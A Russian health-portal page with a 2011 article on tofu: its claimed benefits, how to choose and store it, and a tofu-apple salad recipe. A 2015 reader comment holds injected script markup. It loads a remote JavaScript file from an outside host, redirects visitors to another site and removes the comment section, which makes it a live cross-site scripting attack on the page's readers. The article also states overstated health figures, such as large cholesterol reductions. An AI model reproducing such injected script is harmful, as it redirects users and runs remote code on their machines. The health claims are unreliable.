Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Тофу – растительный сыр  >>  Тофу – растительный сыр
 
Обратная связь
 

Тофу – растительный сыр

Размер шрифта
28 ноября 2011 08:13
  • google_analytics: false
  • Нравится

Как выбрать, как сохранить и как правильно съесть тофу?

Соевый сыр тофу богат белками и почти не содержит жиров и углеводов. По одной из версий, тофу получился из соевого пюре, куда попала выпаренная морская вода, или сульфат кальция. Сейчас вместо сульфата кальция в приготовлении тофу используют уксус или сок лимона.

Полезные свойства тофу

  1. Тофу богат соевым белком, который помогает снизить общий уровень холестерина на 30%, а уровень «плохого» холестерина – на 35-40%, повышая уровень «хорошего». Тофу на вашем столе – это профилактика атеротромбоза, инфаркта миокарда и инсульта.

  2. В любых соевых продуктах много фитоэстрогенов, обладающих схожим действием с эстрогенами, женскими половыми гормонами. В период постменопаузы, когда уровень женских гормонов падает, соевые фитоэстрогены помогают восстановить гормональный баланс. 

  3. Тофу – прекрасный источник железа. Но «растительное» железо усваивается намного хуже «мясного». Ситуацию можно поправить, если добавить в рацион продукты, богатые витамином С: цитрусовые, фруктовые соки, ягоды, помидоры, брокколи и капусту. Нельзя употреблять тофу с кофе и чаем, так как кофеин блокирует всасывание железа.

  4. В 100 г тофу всего 73 ккал.

Пьедестал почета по содержанию белка

1. соевые бобы – 28,62 г
2. тофу – 9,16 г
3. соевый соус– 1,89 г

Как выбрать

  • Покупайте тофу без соли, без трав и прочих добавок. «Правильный» тофу должен впитывать ароматы всех продуктов, к которым его добавляют.
  • Более твердый тофу жирнее мягкого.
  • Выбирая сыр тофу с высоким содержанием кальция, ищите на упаковке надпись «с осадком кальция» или «сульфат кальция».
  • Проверяйте срок годности продукта.

    Как хранить
  • Закрытый пакет с тофу в бумажной упаковке можно хранить при комнатной температуре. В холодильнике в закрытой упаковке он будет свежим в течение 5 месяцев. Замораживать этот сыр не стоит: он станет пористым и желтым, но не потеряет вкусовых свойств.
  • Открыв упаковку, промойте сыр и положите его в воду. По возможности откачайте воздух из контейнера. Поставьте контейнер в холодильник. Меняйте воду каждый день и вы сохраните тофу свежим на протяжении всей недели.

Как готовить

Твердый тофу жарят, с мягким делают соусы, супы и десерты. Тофу безвкусен, поэтому его обязательно заправляют специями.

Рецепт салата из сыра тофу

  • Тофу 100 г
  • 1 яблоко
  • Сок 1 лимона
  • Листья салата
  1. Сыр порежьте кубиками, натрите яблоки на терке, листья крупно порвите руками.

  2. Половину лимона мелко нарежьте, из второй половины выдавите сок.

  3. Смешайте ингредиенты.

Этот салат можно съесть с рисовой лепешкой или с кусочком хлеба из муки грубого помола.

Видеосюжеты по теме:

Сыр тофу. Привет из Китая

 


 

 

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.